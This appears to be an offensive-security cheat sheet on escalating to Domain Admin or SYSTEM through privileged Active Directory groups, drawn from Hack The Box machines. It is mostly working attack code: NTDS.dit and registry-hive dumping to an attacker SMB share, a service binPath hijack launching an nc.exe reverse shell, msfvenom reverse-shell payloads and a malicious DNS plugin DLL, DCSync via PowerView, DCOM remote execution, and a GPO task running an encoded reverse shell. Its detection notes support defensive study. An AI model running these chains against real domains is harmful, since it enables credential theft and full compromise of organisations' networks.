Group Membership Abuse
#Overview
Active Directory comes with numerous built-in privileged groups that grant specific elevated capabilities beyond standard domain user rights. A user who is a member of one of these groups — whether through ACL abuse, credential compromise, or misconfiguration — can often escalate directly to Domain Admin or SYSTEM. Understanding each group's specific privileges and exploitation techniques is essential, as the attack path varies significantly between groups.
#Prerequisites
- Membership in one of the privileged groups described below
- Knowledge of the group's specific capabilities
- Appropriate tools for the exploitation path (varies per group)
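Before picking a path, confirm what the current token actually carries. The following is an added example (not from the original page): it maps the logon token's group SIDs onto the groups covered below (BUILTIN groups by their fixed RIDs, Group Policy Creator Owners by domain RID 520, the rest by name) and reads the token privileges the Backup/Server/Print Operators paths depend on. The group-name list is an assumption about what to look for; adjust it to the environment.

```powershell
# Added example, not part of the original page. Run in the compromised user's PowerShell session.
# A token only reflects memberships at logon time: after adding yourself to a group, log on again.
$BuiltinGroups = @{
    'S-1-5-32-544' = 'Administrators'
    'S-1-5-32-548' = 'Account Operators'
    'S-1-5-32-549' = 'Server Operators'
    'S-1-5-32-550' = 'Print Operators'
    'S-1-5-32-551' = 'Backup Operators'
    'S-1-5-32-555' = 'Remote Desktop Users'
    'S-1-5-32-562' = 'Distributed COM Users'
}
# Domain groups without a fixed RID are matched by name (assumed names, extend as needed)
$DomainGroupNames = @('DnsAdmins', 'Exchange Windows Permissions', 'Exchange Trusted Subsystem')
$PrivilegesOfInterest = @('SeBackupPrivilege', 'SeRestorePrivilege', 'SeLoadDriverPrivilege')

function Get-PrivilegedGroupHits {
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    foreach ($sid in $identity.Groups) {
        $value = $sid.Value
        if ($BuiltinGroups.ContainsKey($value)) {
            [pscustomobject]@{ Group = $BuiltinGroups[$value]; Sid = $value; Source = 'well-known RID' }
            continue
        }
        # Group Policy Creator Owners is always <domain SID>-520
        if ($value -match '^S-1-5-21-\d+-\d+-\d+-520$') {
            [pscustomobject]@{ Group = 'Group Policy Creator Owners'; Sid = $value; Source = 'domain RID 520' }
            continue
        }
        # Name translation needs a reachable DC; unknown SIDs are skipped
        try {
            $name = $sid.Translate([System.Security.Principal.NTAccount]).Value.Split('\')[-1]
            if ($DomainGroupNames -contains $name) {
                [pscustomobject]@{ Group = $name; Sid = $value; Source = 'name match' }
            }
        } catch { }
    }
}

function Get-PrivilegeHits {
    # whoami /priv lists token privileges; SeBackupPrivilege is normally present but
    # "Disabled" until a tool such as SeBackupPrivilegeUtils or robocopy enables it.
    whoami /priv /fo csv | ConvertFrom-Csv |
        Where-Object { $PrivilegesOfInterest -contains $_.'Privilege Name' } |
        Select-Object 'Privilege Name', State
}

Get-PrivilegedGroupHits | Format-Table -AutoSize
Get-PrivilegeHits | Format-Table -AutoSize
```

If a group shows up here but the matching section below fails, check the token first: a `net group ... /add` you just ran is not in this token until the next logon, which is also why the Forest chain passes explicit `-Credential` to PowerView.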
#Account Operators
Capabilities: Can create, modify, and delete user and group objects, and log on locally to DCs. Cannot manage anything under AdminSDHolder protection (adminCount=1): Domain Admins, Enterprise Admins, Administrators, the other built-in operator groups (Account, Server, Backup, Print Operators) and administrators' user accounts. Groups created by applications such as Exchange (Exchange Windows Permissions) are not protected, which is what makes the chain below work.
# Create a new user
net user john abc123! /add /domain
# Add it to privileged groups that are NOT AdminSDHolder-protected
net group "Exchange Windows Permissions" john /add /domain
net localgroup "Remote Management Users" john /add
# Real chain from Forest HTB:
# svc-alfresco -> Account Operators -> create john -> add to Exchange Windows Permissions
# -> Exchange Windows Permissions has WriteDACL on domain -> grant DCSync -> secretsdump
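The practical question with Account Operators is which groups you are allowed to touch. Added example (not from the original page): protected objects carry adminCount=1, so an LDAP query for groups without it lists exactly the groups Account Operators can modify; a second function reads a group's security descriptor to confirm the Account Operators ACE before running `net group`. The list of "interesting" names is an assumption (Exchange and other application groups only exist where those products are installed), and .NET DirectorySearcher is used so nothing beyond a domain-joined host is required.

```powershell
# Added example, not part of the original page.
$Interesting = @(
    'Exchange Windows Permissions', 'Exchange Trusted Subsystem', 'Organization Management',
    'DnsAdmins', 'Remote Management Users', 'Group Policy Creator Owners'
)

function Get-UnprotectedGroups {
    param([string]$SearchBase = ([ADSI]'LDAP://RootDSE').defaultNamingContext)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    # adminCount absent or 0 -> not under AdminSDHolder protection -> Account Operators may modify it
    $searcher.Filter = '(&(objectClass=group)(!(adminCount=1)))'
    $searcher.PageSize = 1000
    $null = $searcher.PropertiesToLoad.AddRange(@('samAccountName', 'distinguishedName', 'member'))
    foreach ($r in $searcher.FindAll()) {
        $name = [string]$r.Properties['samaccountname'][0]
        [pscustomobject]@{
            Group       = $name
            Interesting = ($Interesting -contains $name)
            Members     = $r.Properties['member'].Count
            DN          = [string]$r.Properties['distinguishedname'][0]
        }
    }
}

function Confirm-AccountOperatorsCanWrite {
    # Read the group's DACL and keep the ACEs granted to BUILTIN\Account Operators that allow
    # writing (GenericAll / GenericWrite / WriteProperty covers the member attribute).
    param([Parameter(Mandatory)][string]$GroupDn)
    $entry = [ADSI]"LDAP://$GroupDn"
    $entry.ObjectSecurity.Access | Where-Object {
        $_.IdentityReference.Value -eq 'BUILTIN\Account Operators' -and
        $_.AccessControlType -eq 'Allow' -and
        $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteProperty'
    } | Select-Object IdentityReference, ActiveDirectoryRights, ObjectType
}

$candidates = Get-UnprotectedGroups | Where-Object Interesting
$candidates | Format-Table -AutoSize
foreach ($g in $candidates) {
    "--- $($g.Group)"
    Confirm-AccountOperatorsCanWrite -GroupDn $g.DN | Format-Table -AutoSize
}
```

Protected groups never appear in the first list, so a missing Domain Admins entry is expected; the useful output is an unprotected group that carries rights elsewhere (WriteDACL on the domain, DNS server control, WinRM access).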
#Backup Operators
Capabilities: SeBackupPrivilege and SeRestorePrivilege, plus local logon to DCs. SeBackupPrivilege bypasses NTFS ACLs for read, so any file on disk can be copied, including the SAM, SYSTEM and SECURITY hives. NTDS.dit is held open exclusively by LSASS, so it has to come from a backup (wbadmin) or a shadow copy rather than a direct copy.
Method A: Direct NTDS.dit dump via wbadmin
# From Blackfield HTB:
# 1. Set up Samba share on attacker machine
# In /etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
interfaces = tun0
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
# 2. Create Samba user and start service
adduser smbuser && smbpasswd -a smbuser && service smbd restart
# 3. Mount share from WinRM and backup NTDS
net use k: \\10.10.14.3\smb /user:smbuser smbpass
echo "Y" | wbadmin start backup -backuptarget:\\10.10.14.3\smb -include:c:\windows\ntds
# 4. Get backup version and restore NTDS.dit to local filesystem
wbadmin get versions
echo "Y" | wbadmin start recovery -version:<VERSION_ID> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
# 5. Export SYSTEM hive
reg save HKLM\SYSTEM C:\system.hive
# 6. Transfer files and extract all hashes
copy C:\ntds.dit \\10.10.14.3\smb\NTDS.dit
copy C:\system.hive \\10.10.14.3\smb\system.hive
secretsdump.py -ntds NTDS.dit -system system.hive LOCAL
Method B: Shadow Copy via diskshadow
# Create diskshadow script (PowerShell here-string; an explicit ASCII encoding avoids the UTF-16
# that Windows PowerShell's ">" redirection writes by default)
Set-Content -Path C:\Windows\Temp\vss.txt -Encoding Ascii -Value @"
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit
"@
# Execute diskshadow
diskshadow /s C:\Windows\Temp\vss.txt
# Creates a shadow volume accessible via H: drive
# Copy NTDS.dit and the hives from the shadow volume using SeBackupPrivilege
# (SeBackupPrivilegeUtils: upload both DLLs, import them, enable the privilege in this token)
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit C:\Windows\Temp\NTDS -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM C:\Windows\Temp\SYSTEM -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SAM C:\Windows\Temp\SAM -Overwrite
Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY C:\Windows\Temp\SECURITY -Overwrite
# Extract hashes locally (file names are case-sensitive on the attacker box)
secretsdump.py -ntds NTDS -system SYSTEM LOCAL
# For member servers (no NTDS.dit):
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Method C: robocopy with /b flag
# Read files with backup semantics (/b), bypassing NTFS ACLs; copy into a scratch directory, not C:\
robocopy /b C:\Users\Administrator\Desktop\ C:\Windows\Temp\loot\
# Note: backup semantics do not bypass EFS. Encrypted files either fail or (with /EFSRAW) come out
# as ciphertext that needs the owner's EFS key, so look for hashes and config files instead
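Before shipping gigabytes over the SMB share, check that what landed in the temp directory is a usable database and hives. Added example (not from the original page): a registry hive begins with the ASCII magic `regf`; an ESE database such as NTDS.dit carries the signature 0x89ABCDEF at byte offset 4 and its shutdown state at offset 52 (2 = dirty shutdown, 3 = clean shutdown). The file names and directory are the ones used by Method B above; `esentutl /p` is the standard repair for a dirty copy if secretsdump will not parse it.

```powershell
# Added example, not part of the original page.
function Read-Header {
    # Read only the first $Length bytes; NTDS.dit can be several GB
    param([Parameter(Mandatory)][string]$Path, [int]$Length = 64)
    $fs = [System.IO.File]::Open($Path, [System.IO.FileMode]::Open,
                                 [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite)
    try {
        $buf = New-Object byte[] $Length
        $null = $fs.Read($buf, 0, $Length)
        return ,$buf          # comma keeps the byte[] from being unrolled
    } finally { $fs.Dispose() }
}

function Test-RegistryHive {
    param([Parameter(Mandatory)][string]$Path)
    $h = Read-Header -Path $Path -Length 4
    $magic = [System.Text.Encoding]::ASCII.GetString($h)
    [pscustomobject]@{ File = $Path; Type = 'hive'; Valid = ($magic -eq 'regf'); Detail = "magic=$magic" }
}

function Test-EseDatabase {
    param([Parameter(Mandatory)][string]$Path)
    $h     = Read-Header -Path $Path -Length 64
    $sig   = [BitConverter]::ToUInt32($h, 4)     # ESE signature 0x89ABCDEF
    $state = [BitConverter]::ToUInt32($h, 52)    # dbstate: 2 DirtyShutdown, 3 CleanShutdown
    $stateName = switch ($state) { 2 { 'DirtyShutdown' } 3 { 'CleanShutdown' } default { "state=$state" } }
    [pscustomobject]@{
        File   = $Path; Type = 'ese'
        Valid  = ($sig -eq 0x89ABCDEF)
        Detail = ('sig=0x{0:X8} {1}' -f $sig, $stateName)
    }
}

function Test-DumpedArtifacts {
    param([string]$Dir = 'C:\Windows\Temp')
    $ntds = Join-Path $Dir 'NTDS'
    if (Test-Path $ntds) { Test-EseDatabase -Path $ntds }
    foreach ($hive in 'SYSTEM', 'SAM', 'SECURITY') {
        $p = Join-Path $Dir $hive
        if (Test-Path $p) { Test-RegistryHive -Path $p }
    }
}

Test-DumpedArtifacts | Format-Table -AutoSize
# A DirtyShutdown NTDS.dit is normal for a copy taken from a live shadow volume. If secretsdump
# complains about it, repair the copy first:  esentutl /p C:\Windows\Temp\NTDS /o
```

A `Valid = False` on SYSTEM usually means the copy picked up a transaction log or a zero-length file rather than the hive; rerun the copy from the shadow volume rather than debugging secretsdump.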
#Server Operators
Capabilities: Members can log on to DCs interactively, hold SeBackupPrivilege, SeRestorePrivilege and SeShutdownPrivilege there, and can change the configuration of most services (the service ACLs on a DC grant the group change-config plus start/stop). Pointing a SYSTEM service's binary path at a payload and restarting it therefore gives SYSTEM on the DC.
# From Return HTB (evil-winrm session as svc-printer, a Server Operators member):
# 1. Upload netcat binary
upload /usr/share/windows-resources/binaries/nc.exe
# 2. Point the service binary at the payload (sc.exe requires the space after "binPath=")
sc.exe config vss binPath= "C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.2 1234"
# 3. Restart the service to trigger the shell
sc.exe stop vss
sc.exe start vss
# Note: vss (Volume Shadow Copy) runs as SYSTEM. nc.exe never reports itself as a service, so
# "start" returns error 1053 after ~30 s and the process is terminated with it; use the shell
# immediately, or make the payload a one-shot command that survives on its own:
#   sc.exe config vss binPath= "C:\Windows\System32\cmd.exe /c net localgroup Administrators svc-printer /add"
# 4. Alternative: meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
upload shell.exe
sc.exe config vss binPath= "C:\Users\svc-printer\Desktop\shell.exe"
sc.exe start vss
# Then migrate meterpreter to a stable SYSTEM process before the SCM kills the original
# 5. Restore the original binary path so the service works again
sc.exe config vss binPath= "C:\Windows\system32\vssvc.exe"
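Two things are worth scripting around this chain: checking the service DACL before touching it, and restoring the original ImagePath afterwards. Added example (not from the original page): the first function parses `sc.exe sdshow` output and reports whether Server Operators (SID S-1-5-32-549, abbreviated `SO` in SDDL) hold change-config (`DC`) and start/stop (`RP`/`WP`) on a service; the second swaps the binary path for a one-shot command, triggers it, and puts the original path back. Service name, account name and the command are Return-style placeholders.

```powershell
# Added example, not part of the original page.
function Get-ServiceRightsFor {
    param([Parameter(Mandatory)][string]$Service, [string]$Sid = 'S-1-5-32-549')
    # sc.exe sdshow prints one SDDL line starting with "D:" (DACL, optionally followed by S: SACL)
    $sddl = (sc.exe sdshow $Service | Where-Object { $_ -match '^D:' }) -join ''
    $aces = [regex]::Matches($sddl, '\(([^)]*)\)') | ForEach-Object { $_.Groups[1].Value }
    foreach ($ace in $aces) {
        # ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
        $parts = $ace.Split(';')
        if ($parts[0] -notin 'A', 'D') { continue }          # skip SACL (AU) entries
        $isOurs = ($parts[5] -eq $Sid) -or ($Sid -eq 'S-1-5-32-549' -and $parts[5] -eq 'SO')
        if (-not $isOurs) { continue }
        [pscustomobject]@{
            Type         = $parts[0]                          # A = allow, D = deny
            Rights       = $parts[2]                          # service rights: CC DC LC SW RP WP DT LO CR RC SD WD WO
            CanConfig    = $parts[2] -like '*DC*'             # SERVICE_CHANGE_CONFIG
            CanStartStop = ($parts[2] -like '*RP*') -and ($parts[2] -like '*WP*')  # SERVICE_START / SERVICE_STOP
        }
    }
}

function Invoke-ServiceBinPathAbuse {
    param(
        [Parameter(Mandatory)][string]$Service,
        [Parameter(Mandatory)][string]$Command
    )
    # Reading the ImagePath needs no privilege; keep it so the service can be repaired afterwards
    $orig = (Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$Service").ImagePath
    sc.exe config $Service binPath= $Command | Out-Null
    sc.exe stop $Service | Out-Null
    # A plain executable never reaches SERVICE_RUNNING: sc.exe start blocks ~30 s and returns 1053,
    # but the command has already run as SYSTEM by then.
    sc.exe start $Service | Out-Null
    sc.exe config $Service binPath= $orig | Out-Null
    $orig
}

Get-ServiceRightsFor -Service vss | Format-Table -AutoSize
Invoke-ServiceBinPathAbuse -Service vss -Command 'C:\Windows\System32\cmd.exe /c net localgroup Administrators svc-printer /add'
net localgroup Administrators
```

The same `Get-ServiceRightsFor -Service dns` check answers the question the DNSAdmins section raises later: whether your token can actually restart the DNS service after setting the plugin DLL.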
#DNSAdmins
Capabilities: Can manage DNS server configuration over the DNS RPC interface (dnscmd). Historically this included setting the ServerLevelPluginDll value, which makes dns.exe (running as SYSTEM on the DC) load an arbitrary DLL on its next start. Two caveats: DNSAdmins membership does not by itself grant stop/start rights on the DNS service, so you may need another path to restart it or wait for a reboot; and Microsoft hardened plugin loading in 2021 updates, so confirm the target's patch level before relying on it.
# Generate malicious DLL (e.g., with msfvenom); bitness must match dns.exe (x64 on any current DC)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > evil.dll
# Host the DLL on a share the DC's computer account can read (anonymous SMB share), then point DNS at it.
# dnscmd uses the DNS RPC interface, which is what DNSAdmins membership authorises
dnscmd <DC> /config /serverlevelplugindll \\<attacker_ip>\share\evil.dll
dnscmd <DC> /info /serverlevelplugindll
# Restart the DNS service so dns.exe loads the DLL (needs stop/start on the service; check sc.exe sdshow dns)
sc.exe \\<DC> stop dns
sc.exe \\<DC> start dns
# Alternative: write the registry value directly. This needs write access to the key, which
# DNSAdmins does not have by default, so it only applies once you are local admin on the DC
reg add "HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll /t REG_SZ /d "\\<attacker_ip>\share\evil.dll"
sc.exe stop dns
sc.exe start dns
# Cleanup once you have SYSTEM, otherwise the DNS service keeps trying to load the plugin
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll /f
#Print Operators
Capabilities: SeLoadDriverPrivilege (the "Load and unload device drivers" user right, granted to the group on DCs) and interactive logon to DCs. Driver signature enforcement still applies, so this is a BYOVD exercise: load a signed but vulnerable driver, then use its bug for kernel code execution. On Windows 10 1803 / Server 2019 and later this no longer works from a non-administrator context, so check the target build first.
# Abuse SeLoadDriverPrivilege to load a malicious driver
# Requires a vulnerable signed driver (BYOVD — Bring Your Own Vulnerable Driver)
# Common target: Capcom.sys or RTCore64.sys
# 1. Register the driver under the caller's own registry hive (no admin needed) and call NtLoadDriver, e.g.
#    EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Users\Public\Capcom.sys
# 2. Exploit the loaded driver (e.g. ExploitCapcom) to execute code in kernel context -> SYSTEM
#Exchange Windows Permissions
Capabilities: WriteDACL on the domain object. This allows granting any right (including DCSync) to any principal.
# From Forest HTB (via Account Operators -> added to Exchange Windows Permissions):
# 1. Add user to Exchange Windows Permissions group
net group "Exchange Windows Permissions" john /add /domain
# 2. Grant DCSync to the controlled user (PowerView dev branch). -Credential is needed because the
#    current token predates the group change; a fresh logon as john carries the new membership
. .\PowerView.ps1
$pass = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\john', $pass)
Add-DomainObjectAcl -TargetIdentity 'DC=htb,DC=local' -PrincipalIdentity john -Credential $cred -Rights DCSync
# 3. DCSync from the attacker box
impacket-secretsdump -just-dc htb/john@10.10.10.161
#Exchange Trusted Subsystem
Capabilities: Exchange Trusted Subsystem is itself a member of Exchange Windows Permissions (and Exchange server computer accounts are members of it), so it inherits the WriteDACL-on-domain path.
# Compromising an Exchange server's computer account, or any member of this group,
# gives the same capability as Exchange Windows Permissions
# Follow the same chain: grant DCSync, then secretsdump
#Remote Desktop Users
Capabilities: Interactive RDP logon to hosts where the group holds the "Allow log on through Remote Desktop Services" right. Member servers grant this to Remote Desktop Users by default; domain controllers do not (the Default Domain Controllers Policy grants it only to Administrators), so membership alone does not get you an RDP session on a DC.
# RDP login with compromised credentials
xfreerdp /v:<target> /d:<domain> /u:<user> /p:<pass> +clipboard /dynamic-resolution
# Useful for graphical enumeration and running tools that require GUI context
#Distributed COM Users
Capabilities: Passes the machine-wide DCOM launch/activation limits on hosts where the group is listed (it is by default). That is only the outer gate: each DCOM application's own LaunchPermission still applies, and objects without one fall back to the default launch ACL (Administrators, SYSTEM, INTERACTIVE). MMC20.Application-style lateral movement therefore normally still needs local admin on the target unless an application ACL has been loosened.
# DCOM lateral movement using MMC20.Application or ShellWindows/ShellBrowserWindow
# Allows remote command execution on target machines as the calling user (TCP 135 plus dynamic RPC ports)
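To see both gates at once, decode the DCOM security descriptors from the registry before trying the remote call. Added example (not from the original page): it reads the machine-wide `MachineLaunchRestriction` and the per-AppID `LaunchPermission` for a ProgID (resolved ProgID -> CLSID -> AppID), lists each ACE with the COM launch/activation bits (1 execute, 2 local launch, 4 remote launch, 8 local activation, 16 remote activation), and then shows the classic MMC20.Application `ExecuteShellCommand` call. Run the check on the target (or an identically built host); the target name and command are placeholders.

```powershell
# Added example, not part of the original page.
$ComRights = @{ 1 = 'Execute'; 2 = 'LocalLaunch'; 4 = 'RemoteLaunch'; 8 = 'LocalActivation'; 16 = 'RemoteActivation' }

function ConvertFrom-DcomAcl {
    param([Parameter(Mandatory)][byte[]]$Binary)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Binary, 0)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $mask   = $ace.AccessMask
        $rights = ($ComRights.Keys | Sort-Object | Where-Object { $mask -band $_ } |
                   ForEach-Object { $ComRights[$_] }) -join ','
        $who = try { $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
               catch { $ace.SecurityIdentifier.Value }
        [pscustomobject]@{ Principal = $who; Type = $ace.AceType; Rights = $rights }
    }
}

function Resolve-DcomAppId {
    param([Parameter(Mandatory)][string]$ProgId)
    $clsid = (Get-ItemProperty "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID").'(default)'
    (Get-ItemProperty "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid").AppID
}

function Get-DcomLaunchPermissions {
    param([Parameter(Mandatory)][string]$AppId)
    # Outer gate: machine-wide limits, which is where Distributed COM Users is granted everything
    $ole    = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Ole'
    $limits = ConvertFrom-DcomAcl -Binary $ole.MachineLaunchRestriction
    # Inner gate: the application's own ACL; if absent, DefaultLaunchPermission applies
    $app = Get-ItemProperty "Registry::HKEY_CLASSES_ROOT\AppID\$AppId" -ErrorAction SilentlyContinue
    $perApp = if ($app.LaunchPermission) { ConvertFrom-DcomAcl -Binary $app.LaunchPermission }
              elseif ($ole.DefaultLaunchPermission) { ConvertFrom-DcomAcl -Binary $ole.DefaultLaunchPermission }
              else { 'built-in default: Administrators, SYSTEM, INTERACTIVE' }
    [pscustomobject]@{ AppId = $AppId; MachineLimits = $limits; AppLaunch = $perApp }
}

function Invoke-Mmc20Command {
    # Classic DCOM lateral movement; succeeds only if the caller passes both ACLs on $Target
    param([Parameter(Mandatory)][string]$Target, [Parameter(Mandatory)][string]$Arguments)
    $mmc = [Activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application', $Target))
    # ExecuteShellCommand(Command, Directory, Parameters, WindowState); "7" = minimized/hidden
    $mmc.Document.ActiveView.ExecuteShellCommand('C:\Windows\System32\cmd.exe', $null, $Arguments, '7')
}

$appId = Resolve-DcomAppId -ProgId 'MMC20.Application'
Get-DcomLaunchPermissions -AppId $appId | Format-List
# Invoke-Mmc20Command -Target 'dc01.corp.local' -Arguments '/c whoami > C:\Windows\Temp\dcom.txt'
```

If `AppLaunch` shows only Administrators/SYSTEM/INTERACTIVE, Distributed COM Users membership will get you an access-denied at activation regardless of what `MachineLimits` says; the group is useful when an application ACL has been widened, which is exactly what this output reveals.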
#Group Policy Creator Owners
Capabilities: Can create GPOs in the domain and has full control of the GPOs it creates. Linking a GPO to an OU is a separate right (write access to the OU's gPLink attribute) that this group does not hold by default; where that right is available on the Domain Controllers OU, a linked GPO runs code as SYSTEM on every DC.
# From TheFrizz HTB (GroupPolicy RSAT module on the foothold):
# 1. Create the GPO and link it to the Domain Controllers OU (the link requires write on the OU's gPLink)
New-GPO -Name privesc | New-GPLink -Target "OU=Domain Controllers,DC=frizz,DC=htb" -LinkEnabled Yes
# 2. Add an immediate scheduled task that runs as SYSTEM on the linked computers
.\SharpGPOAbuse.exe --AddComputerTask --GPOName "privesc" --Author TCG --TaskName "PrivEsc" --Command "powershell.exe" --Arguments "-e <BASE64_REV_SHELL>"
# 3. Apply: DCs refresh Group Policy every 5 minutes by default; gpupdate /force only helps when run on the DC itself
gpupdate /force
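Because the link, not the GPO, is the part this group usually lacks, check the OU's gPLink ACL against your token before creating anything. Added example (not from the original page): it reads the Domain Controllers OU's security descriptor with raw SIDs, keeps Allow ACEs that match the current token, and reports those granting WriteProperty on gPLink (schemaIDGUID f30e3bbe-9ff0-11d1-b603-0000f80367c1, or an all-properties ACE) or GenericWrite/GenericAll; only then does it create and link the GPO with the same cmdlets as above. The OU DN and GPO name are the TheFrizz values; the GroupPolicy RSAT module is assumed to be present.

```powershell
# Added example, not part of the original page.
$GpLinkGuid = [guid]'f30e3bbe-9ff0-11d1-b603-0000f80367c1'   # schemaIDGUID of the gPLink attribute

function Get-CurrentTokenSids {
    # User SID plus every group SID in the logon token (nested memberships are already expanded)
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Test-GpLinkWritable {
    param([Parameter(Mandatory)][string]$OuDn)
    $ou    = [ADSI]"LDAP://$OuDn"
    $mine  = Get-CurrentTokenSids
    $rules = $ou.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($r in $rules) {
        if ($r.AccessControlType -ne 'Allow') { continue }
        if ($mine -notcontains $r.IdentityReference.Value) { continue }
        $rights = $r.ActiveDirectoryRights
        # WriteProperty scoped to gPLink, or to all properties (empty GUID)
        $writesLink = (($rights -band [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty) -ne 0) -and
                      ($r.ObjectType -eq $GpLinkGuid -or $r.ObjectType -eq [guid]::Empty)
        $generic    = (($rights -band [System.DirectoryServices.ActiveDirectoryRights]::GenericWrite) -ne 0) -or
                      (($rights -band [System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -ne 0)
        if ($writesLink -or $generic) {
            [pscustomobject]@{ Principal = $r.IdentityReference.Value; Rights = $rights; ObjectType = $r.ObjectType }
        }
    }
}

function New-LinkedAbuseGpo {
    param([string]$Name = 'privesc', [string]$OuDn = 'OU=Domain Controllers,DC=frizz,DC=htb')
    if (-not (Test-GpLinkWritable -OuDn $OuDn)) {
        throw "No write access to gPLink on $OuDn for this token; a GPO would be created but never linked"
    }
    Import-Module GroupPolicy
    $gpo = New-GPO -Name $Name
    New-GPLink -Guid $gpo.Id -Target $OuDn -LinkEnabled Yes | Out-Null
    $gpo
}

Test-GpLinkWritable -OuDn 'OU=Domain Controllers,DC=frizz,DC=htb' | Format-Table -AutoSize
# New-LinkedAbuseGpo -Name privesc
# Then add the scheduled task with SharpGPOAbuse as above; DCs pick the GPO up within ~5 minutes.
```

An empty result means the group membership alone is not enough here; look for a different OU whose gPLink you can write (any OU containing a computer you care about), or for a delegated ACE found via BloodHound's WriteGPLink edge.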
#Common Pitfalls
- Protected groups: Account Operators cannot modify Domain Admins or any other AdminSDHolder-protected group or account (adminCount=1); look instead for unprotected groups that still carry rights (Exchange Windows Permissions, DnsAdmins, Remote Management Users)
- EFS: SeBackupPrivilege bypasses NTFS ACLs, not EFS. Encrypted files fail to copy or (robocopy /EFSRAW) come out as ciphertext that needs the owner's DPAPI-protected EFS key or a recovery-agent key; the SYSTEM hive alone does not decrypt them
- Broken service: after the binPath trick the service will not start until the original path is restored (sc.exe config vss binPath= "C:\Windows\system32\vssvc.exe"); a payload that is not a real service binary is also terminated when the ~30 s start timeout expires
- DNSAdmins DLL path: dns.exe loads the DLL as SYSTEM on the DC, so a UNC path must be readable by the DC's computer account or anonymously; DNSAdmins membership alone usually cannot stop/start the DNS service
- wbadmin versioning: pass the exact version identifier from "wbadmin get versions" when restoring; the backup target must be a UNC path or a different volume from the one being backed up
#OPSEC Considerations
- Service binPath changes rewrite the service's ImagePath registry value (Sysmon Event ID 13, or 4657 with registry auditing); the System log then shows 7036 stop/start transitions and 7000/7009 when the fake binary fails to report as a service
- Adding members to groups generates Event IDs 4728 (global), 4732 (domain local/local) and 4756 (universal); user creation is 4720
- Backup Operators activity: wbadmin writes to the Microsoft-Windows-Backup log; SeBackupPrivilege use shows as 4673/4674 with privilege-use auditing, and hive/NTDS reads as 4656/4663 where object access auditing is configured
- GPO creation and modification is logged as Directory Service changes (5137 create, 5136 modify) on the DC
- DNS plugin loads: Sysmon Event ID 7 (Image Loaded) in dns.exe, plus the ServerLevelPluginDll registry write (Sysmon 13)
- Shadow copy creation (vssadmin/diskshadow) is logged and commonly monitored
- DCSync generates 4662 with the replication control-access GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 DS-Replication-Get-Changes, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 DS-Replication-Get-Changes-All) from an account that is not a DC
#Post-Exploitation Value
- Several group paths lead directly to Domain Admin (Exchange Windows Permissions -> DCSync)
- Server Operators give SYSTEM on the DC via service abuse; Backup Operators give NTDS.dit and the hives, i.e. every domain hash
- DNSAdmins provides SYSTEM on the DNS server (often the DC)
- Group Policy Creator Owners provides code execution as SYSTEM on every computer in a linkable OU
- Once the group member's account is controlled, these paths need no further credentials: they abuse delegated rights, so detection has to come from the object, service and GPO changes listed above rather than from credential-theft telemetry
#Tool References
| Tool | Link |
|---|---|
| SharpGPOAbuse | https://github.com/byronkg/SharpGPOAbuse |
| SeBackupPrivilegeUtils | https://github.com/giuliano108/SeBackupPrivilege |
| PowerView (dev branch, provides Add-DomainObjectAcl) | https://github.com/PowerShellMafia/PowerSploit/tree/dev |
| secretsdump (Impacket) | https://github.com/fortra/impacket |
#Source Machines
- Forest (Easy) — Account Operators -> Exchange Windows Permissions -> WriteDACL -> DCSync
- Blackfield (Hard) — Backup Operators -> wbadmin backup NTDS -> secretsdump LOCAL -> Administrator hash
- Return (Easy) — Server Operators -> sc config vss binPath -> SYSTEM shell
- TheFrizz (Medium) — Group Policy Creator Owners -> New-GPO + SharpGPOAbuse -> SYSTEM
- Multimaster (Insane) — Server Operators -> sc config browser + SeBackupPrivilege for flag